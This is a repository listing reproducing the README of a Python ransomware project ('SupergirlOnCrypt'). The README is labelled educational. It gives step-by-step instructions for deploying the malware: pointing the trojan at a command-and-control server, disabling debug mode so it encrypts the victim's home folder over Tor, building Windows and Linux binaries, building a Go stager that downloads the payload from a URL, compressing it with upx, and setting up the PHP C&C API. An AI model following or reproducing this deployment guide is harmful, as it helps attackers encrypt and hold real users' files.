https://github.com/thoughtfuldev/supergirloncrypt

CryptoTrojan in Python (For educational purpose ONLY)
https://github.com/thoughtfuldev/supergirloncrypt

crypto cryptography python python3 ransomware supergirl

Last synced: 4 days ago
JSON representation

CryptoTrojan in Python (For educational purpose ONLY)

• Host: GitHub
• URL: https://github.com/thoughtfuldev/supergirloncrypt
• Owner: ThoughtfulDev
• License: wtfpl
• Created: 2017-08-04T14:33:34.000Z (over 7 years ago)
• Default Branch: master
• Last Pushed: 2018-03-23T09:25:07.000Z (over 6 years ago)
• Last Synced: 2024-08-12T03:06:16.259Z (3 months ago)
• Topics: crypto, cryptography, python, python3, ransomware, supergirl
• Language: Python
• Homepage:
• Size: 29.9 MB
• Stars: 44
• Watchers: 4
• Forks: 12
• Open Issues: 1
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

        
# SupergirlOnCrypt :heart: :punch: :boom:

![Project Logo](https://thoughtful-dev.com/projects/supergirloncrypt/header.jpg)

**For EDUCATIONAL PURPOSE ONLY**

This is a Crypto Trojan written in Python which can be packed using Pyinstaller... 

and i :heart: Supergirl so there you go.

**To decrypt the Data the Victim has to answer some Questions about Supergirl! (No Payment required since it was just a fun Project)**

## Content

1. [Requirements](#requirements)

2. [Setup](#setup)

3. [Building](#building)

---

![Image while Building](https://thoughtful-dev.com/projects/supergirloncrypt/term.png)

---

## Requirements

Both Windows AND Linux must have Python >= 3.5 installed to build the Executable/Binary.

Optionally you need the Golang compiler if you want to use the Go Stager because the Binary with Pyinstaller is quite large (~30mb - Windows and Linux)

(Go Stager is only ~700kb).

---

## Setup

We will generate the API´s public and private key in this process.

So if you first generate a binary for Linux as shown here then you have to copy the whole repository folder to the windows box and only choose to recreate the `venv`.

## The Trojan

1. Change the API_URL in App/Config.py to your C&C Server URL

2. Disable DEBUG_MODE (Leave it on if your API is running locally because otherwise Tor cant reach your local network)

3. Optionally change your File Types

4. Build Executables/Binary for Windows and/or Linux

5. Setup API

## Overview of DEBUG True vs False

Debug On | Debug Off

------------ | -------------

Creates a logfile | No logfile

Does not user Tor | Uses Tor to communicate

Encrypts Folder `./test_files` | Encrypts Users HomeFolder

**If you are Testing leave the DEBUG MODE ON OR USE A VM**

## Building

### Linux

```

$ cd Scripts

$ ./supergirl.sh setup python3

$ ./supergirl.sh build

```

**Now copy the whole folder to the Windows VM/Machine where you want to build the Windows Executable. When running the `supergirl.ps1` ONLY recreate the `venv` and NOT the Keys since they are already generated from our Linux Setup.** *

*Optionally you can also clone the Repo to the Windows Machine and only replace `API/bin/private.key` and `App/res/server.public.key`

**This also applies vice versa**

### Windows

```

PS> cd Scripts

PS> .\supergirl.ps1 -mode setup -path C:\\...\\python.exe

PS> .\supergirl.ps1 -mode build

```

### Building Stager

1. Upload your Binary which you gathered from the previous step

2. Go to `./Stagers/Go` and open `main.go`

3. Change line 34 `var url string = "your-direct-download-url-here"`

#### Building a Linux Stager

4. `GOOS=linux go build -ldflags="-s -w" -o stager main.go`

#### Building a Windows Stager

5. `GOOS=windows GOARCH=386 go build -ldflags="-s -w -H=windowsgui" -o stager.exe main.go`

6. Optionally compress the Stager(.exe) binary with upx

7. LINUX: `upx --ultra-brute -o compressed_stager stager`

7. WINDOWS: `upx.exe --ultra-brute -o compressed_stager.exe stager.exe`

8. Done

## API

Since we communicate with our API we need to set it up. The API(located in ./API duhh) is written in PHP so any Linux /Win Server will do.

On your Ubuntu C&C Server run:

```

$ sudo add-apt-repository ppa:ondrej/php

$ sudo apt update

$ sudo apt install apache2 php7.1 libapache2-mod-php7.1 php7.1-mbstring php7.1-sqlite3 php7.1-xml

$ sudo apt install composer unzip

```

Now copy the API Folder to your Server in the www root

```

$ cd /var/html

$ composer install

```

We need to install python to decrypt our keys if a user wants to decrypt

```

$ sudo apt install python3 python3-dev python3-pip

$ pip3 install cryptography

```

Your API should now be ready on http://ip/public (should respond with 501)

**I wont show you how to setup a Tor hidden Service**

## Contributing

You can always open a Pull Request

OR

[![Buy me a coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/supergirl)

# Disclaimer

### FOR EDUCATIONAL PURPOSE ONLY I AM NOT RESPONSIBLE FOR ANYTHING

```

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE

                    Version 2, December 2004

 Copyright (C) 2017 ThoughtfulDev

 Everyone is permitted to copy and distribute verbatim or modified

 copies of this license document, and changing it is allowed as long

 as the name is changed.

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE

   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION

  0. You just DO WHAT THE FUCK YOU WANT TO.

```

---

I have no Idea if you understand this README.